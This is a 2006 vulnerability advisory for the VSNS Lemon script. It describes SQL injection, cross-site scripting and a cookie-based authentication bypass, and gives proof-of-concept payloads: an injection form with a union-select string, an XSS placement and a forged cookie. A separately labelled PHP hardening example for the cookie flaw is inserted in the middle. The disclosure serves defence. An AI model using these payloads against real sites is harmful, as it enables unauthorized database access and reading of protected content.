Multiple Vulnerabilities in VSNS Lemon
Summary
- Vulnerability: Multiple Vulnerabilities in VSNS Lemon
- Discovered: 2006.03.27
- Last Update: 2006.04.06 Exploitation code published
- ID: EV0106
- CVE: CVE-2006-1553, CVE-2006-1554, CVE-2006-1555
- Risk Level: medium
- Type: Multiple Vulnerabilities
- Status: Unpatched. No reply from developer(s)
- Vendor: Tachyon (http://tachyondecay.net/)
- Vulnerable Software: VSNS Lemon
- Version: 3.2.0
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple vulnerabilities were found in the VSNS Lemon script.
1. SQL Injection.
Vulnerable script: functions/final_functions.php
The variable $id is not properly sanitized before being used in an SQL query. This can be used to bypass authentication or to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
2. Cross-Site Scripting.
Vulnerable form: the add-comment form. The 'name' parameter is not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
3. Cookie-Based Authentication Bypass.
It is possible to bypass authentication for password-protected articles. The password-checking function does not compare the password; it only checks that the cookie value exists.
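One way to close the cookie-based bypass in item 3, as an added example that is not VSNS Lemon's code or the advisory author's: the unlock cookie carries an HMAC over the topic id and the stored password hash instead of a bare flag. The function names, the cookie layout and SERVER_SECRET are assumptions made for illustration.

```php
<?php
// Added example, not VSNS Lemon code. Function names, cookie layout and
// SERVER_SECRET are assumptions for illustration.
const SERVER_SECRET = 'placeholder-load-a-random-secret-from-config';

// Weak pattern the advisory describes: the cookie only has to exist.
function is_unlocked_weak(array $cookies, int $topicId): bool
{
    return isset($cookies['vsns'][$topicId]);
}

// Token bound to the topic and the stored password hash: it cannot be built
// without the server secret and is invalidated when the password changes.
function make_unlock_token(int $topicId, string $storedHash): string
{
    return hash_hmac('sha256', $topicId . '|' . $storedHash, SERVER_SECRET);
}

// Password form handler: returns the cookie value to set, or null when the
// submitted password does not match.
function unlock_topic(int $topicId, string $password, string $storedHash): ?string
{
    return password_verify($password, $storedHash)
        ? make_unlock_token($topicId, $storedHash)
        : null;
}

// Hardened check: recompute the token and compare in constant time.
function is_unlocked(array $cookies, int $topicId, string $storedHash): bool
{
    $token = $cookies['vsns'][$topicId] ?? null;
    return is_string($token)
        && hash_equals(make_unlock_token($topicId, $storedHash), $token);
}

// Constructed sample data (not taken from a real installation).
$storedHash = password_hash('correct horse', PASSWORD_DEFAULT);
$bare   = ['vsns' => [1 => '1']]; // cookie shape shown in the advisory
$issued = ['vsns' => [1 => unlock_topic(1, 'correct horse', $storedHash)]];

var_dump(is_unlocked_weak($bare, 1));
var_dump(is_unlocked($bare, 1, $storedHash));
var_dump(is_unlocked($issued, 1, $storedHash));
var_dump(unlock_topic(1, 'wrong', $storedHash));
```

The bare cookie passes only the weak check; the hardened check accepts just the token issued after password_verify succeeds.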
PoC/Exploit
1. SQL Injection Example.
<form method="post" action="http://[host]/vsns/index.php">
<input type="hidden" name="towel" value="checkpass">
<input name="id" value="9999' union select 123,4,5,6/*">
<input type="password" name="password" value="123">
<input type="submit" value="Go">
</form>
2. Cross-Site Scripting Example
Add Comment.
Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display
Name: [XSS]
3. Authentication Bypass Example.
Read any password-protected topic:
Cookie: vsns[topic_id] = 1
Solution.
A solution for "Multiple Vulnerabilities in VSNS Lemon" is not available. Check the Tachyon website for updates.